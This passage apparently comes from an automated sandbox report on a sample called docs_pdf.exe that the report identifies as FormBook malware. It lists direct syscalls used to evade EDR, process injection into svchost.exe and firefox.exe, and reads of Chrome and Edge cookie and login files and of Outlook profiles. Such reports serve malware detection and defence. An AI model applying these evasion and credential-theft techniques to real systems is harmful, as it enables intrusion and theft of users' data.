            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001481F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001481F7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011A364 SetUnhandledExceptionFilter,0_2_0011A364
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0011A395

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\isoburn.exeThread register set: target process: 5308Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\docs_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CC7008Jump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00148C93 LogonUserW,0_2_00148C93
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000F3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000F3B4C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000F4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000F4A35
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00154EC9 mouse_event,0_2_00154EC9
            Source: C:\Users\user\Desktop\docs_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001481F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001481F7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00154C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00154C03
            Source: docs_pdf.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: HDtHilbfKZE.exe, 00000004.00000002.4550517282.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000000.2414233263.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551015295.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: docs_pdf.exe, HDtHilbfKZE.exe, 00000004.00000002.4550517282.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000000.2414233263.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551015295.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: HDtHilbfKZE.exe, 00000004.00000002.4550517282.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000000.2414233263.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551015295.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: HDtHilbfKZE.exe, 00000004.00000002.4550517282.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000000.2414233263.00000000015C0000.00000002.00000001.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551015295.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011886B cpuid 0_2_0011886B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001250D7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00132230 GetUserNameW,0_2_00132230
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0012418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0012418A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000F4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000F4AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: docs_pdf.exeBinary or memory string: WIN_81
            Source: docs_pdf.exeBinary or memory string: WIN_XP
            Source: docs_pdf.exeBinary or memory string: WIN_XPe
            Source: docs_pdf.exeBinary or memory string: WIN_VISTA
            Source: docs_pdf.exeBinary or memory string: WIN_7
            Source: docs_pdf.exeBinary or memory string: WIN_8
            Source: docs_pdf.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00166596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00166596
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00166A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00166A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
